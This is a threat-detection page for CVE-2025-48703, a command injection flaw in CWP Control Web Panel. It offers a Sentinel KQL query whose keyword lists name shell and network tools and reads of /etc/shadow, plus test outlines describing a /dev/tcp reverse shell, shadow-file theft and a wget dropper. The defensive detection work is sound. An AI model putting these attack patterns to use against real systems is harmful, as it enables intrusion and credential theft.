CVE-2025-48703

CVE-2025-48703 - CWP Control Web Panel OS Command Injection

Execution Persistence Privilege Escalation Last updated:

Detects exploitation of CVE-2025-48703, an OS command injection vulnerability (CWE-78) in CWP Control Web Panel. This KEV-listed vulnerability allows attackers to inject and execute arbitrary OS commands through the web panel interface, potentially leading to full server compromise.

Vulnerability Intelligence

KEV — Known Exploited

Affected Software

Vendor
CWP
Product
Control Web Panel

Weakness (CWE)

CWE-78

Timeline

Disclosed
November 4, 2025

CVSS

Unscored
Write-up coming soon

What is CVE-2025-48703 CVE-2025-48703 - CWP Control Web Panel OS Command Injection?

CVE-2025-48703 - CWP Control Web Panel OS Command Injection (CVE-2025-48703) maps to the Execution and Persistence and Privilege Escalation tactics — the adversary is trying to run malicious code in MITRE ATT&CK.

This page provides production-ready detection logic for CVE-2025-48703 - CWP Control Web Panel OS Command Injection, covering the data sources and telemetry it touches: Microsoft Defender for Endpoint, Azure Security Center, Syslog. The queries below are rated critical severity at medium confidence, and ship for 7 SIEM platforms — KQL, SPL, Elastic, QRadar, Sumo, YARA-L, LogScale.

MITRE ATT&CK

Tactic
Execution Persistence Privilege Escalation
Microsoft Sentinel / Defender
kusto 
let cwp_processes = dynamic(['perl', 'python', 'python3', 'bash', 'sh', 'curl', 'wget', 'nc', 'ncat', 'socat']);
let cwp_web_paths = dynamic(['/usr/local/cwpsrv/', '/opt/cwp/', 'cwp_api', 'cwp-api']);
let suspicious_cmds = dynamic(['id', 'whoami', 'uname', 'cat /etc/passwd', 'cat /etc/shadow', 'chmod', 'chown', 'curl', 'wget', '/tmp/', '/dev/shm']);
union DeviceProcessEvents, SecurityEvent
| where TimeGenerated > ago(24h)
| where (ParentProcessName has_any ('httpd', 'apache2', 'nginx', 'cwpsrv', 'php-fpm', 'php')
    and ProcessCommandLine has_any (suspicious_cmds))
    or (ProcessCommandLine has_any (cwp_web_paths) and ProcessCommandLine has_any (suspicious_cmds))
| extend RiskScore = case(
    ProcessCommandLine has_any (['cat /etc/shadow', 'chmod 777', '/dev/shm', 'base64']), 'Critical',
    ProcessCommandLine has_any (['wget', 'curl', 'nc ', 'ncat']), 'High',
    'Medium')
| project TimeGenerated, DeviceName, AccountName, ProcessCommandLine, ParentProcessName, InitiatingProcessCommandLine, RiskScore
| order by TimeGenerated desc

Detects suspicious child processes spawned from CWP web server processes that are indicative of OS command injection exploitation. Focuses on web server parent processes executing shell utilities, data exfiltration tools, or file system manipulation commands.

critical severity medium confidence

Data Sources

Microsoft Defender for Endpoint Azure Security Center Syslog

Required Tables

DeviceProcessEvents SecurityEvent Syslog

False Positives

  • Legitimate CWP administrative scripts executed by system administrators via the panel
  • Automated maintenance tasks triggered through CWP cron or task scheduler
  • Security scanning tools running against the CWP host from an authorized scanner
  • Developer testing of CWP API endpoints in a non-production environment

Sigma rule & cross-platform mapping

The detection logic for CVE-2025-48703 - CWP Control Web Panel OS Command Injection (CVE-2025-48703) above is provided in a vendor-neutral form so you can deploy it on any SIEM. The same logic is shipped here as native KQL (Microsoft Sentinel / Defender), SPL (Splunk), Elastic (Elastic Security (EQL)), QRadar (IBM QRadar (AQL)), Sumo (Sumo Logic CSE), YARA-L (Google Chronicle / SecOps), LogScale (CrowdStrike LogScale (CQL)) queries. In Sigma terms, this detection targets the following logsource: 

logsource:
  category: process_creation
  product: windows

Browse the community-maintained Sigma rules for this technique:

SigmaHQ rules for CVE-2025-48703 Sigma rules on detection.fyi

Platform-specific guides for CVE-2025-48703

Detect in Microsoft Sentinel (KQL) Detect in Splunk (SPL) Detect in Elastic Security (Elastic) Detect in IBM QRadar (QRadar) Detect in Sumo Logic CSE (Sumo) Detect in Google Chronicle (YARA-L) Detect in CrowdStrike LogScale (LogScale)
Last updated: 2026-06-19 Research depth: standard
References (3)

Testing Methodology

Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1CWP Command Injection via API Parameter

    Expected signal: Linux audit log EXECVE event showing 'id' executed by the web server user (www-data/apache/cwp); web access log entry with URL-encoded semicolon in query parameter

  2. Test 2Reverse Shell Establishment Post-CWP Exploitation

    Expected signal: Process creation event for bash spawned by www-data user with -i flag and /dev/tcp redirect; outbound TCP connection to attacker IP on port 4444 from the CWP host

  3. Test 3Credential Harvesting via /etc/shadow Access

    Expected signal: Audit log showing www-data user attempting to read /etc/shadow; base64 encoding command in process arguments; file access event on /etc/shadow

  4. Test 4Dropper Download via Injected wget Command

    Expected signal: wget process spawned by www-data with external URL argument; outbound HTTP GET to attacker-controlled server; file creation event in /tmp by web service user; chmod execution on downloaded file

Unlock Pro Content

Get the full detection package for CVE-2025-48703 including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Tactic Hubs

TA0002ExecutionTA0003PersistenceTA0004Privilege Escalation

Related Techniques

T1190Exploit Public-Facing ApplicationT1059Command and Scripting InterpreterT1003OS Credential DumpingT1133External Remote Services

Same Tactic: Execution

Popular Detections